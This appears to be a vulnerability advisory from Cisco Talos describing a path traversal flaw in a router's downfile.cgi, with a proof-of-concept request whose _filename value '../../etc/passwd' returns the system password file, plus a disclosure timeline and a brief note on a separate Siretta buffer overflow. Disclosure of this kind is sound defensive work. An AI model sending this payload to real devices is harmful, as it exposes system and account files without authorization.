The downfile.cgi expects one parameter called _filename that represents the filename of the desired file to be downloaded. At [1] the uploaded parameter is taken and then used at [2] to compose the string <base_folder>/<_filename>. Then, at [3], the specified file is sent in the HTTP response. From [1] to [2] no sanitization for the _filename parameter is performed, which can lead to a path traversal vulnerability, allowing an attacker to download any file of the file system.

**Exploit Proof of Concept**

Sending the following request to the web server:

    POST /downfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 55
    
    _filename=../../etc/passwd&_http_id=<the correct tid>
    

Would result in the web server sending the following response:

    HTTP/1.0 200 OK
    Date: Sat, 01 Jan 2000 03:33:42 GMT
    Content-Type: application/tomato-binary-file
    Cache-Control: no-cache, no-store, must-revalidate, private
    Expires: Thu, 31 Dec 1970 00:00:00 GMT
    Pragma: no-cache
    Content-Disposition:attachment;filename="../../etc/passwd"
    Connection: close
    
    root:x:0:0:root:/root:/bin/sh
    admin:x:0:0:admin:/root:/bin/sh
    nobody:x:65534:65534:nobody:/dev/null:/dev/null
    

The response for this request is the contents of /etc/passwd.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38088: TALOS-2022-1609 || Cisco Talos Intelligence Group

Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the 'no wlan filter mac address WORD descript WORD' command template.

Tag

#intel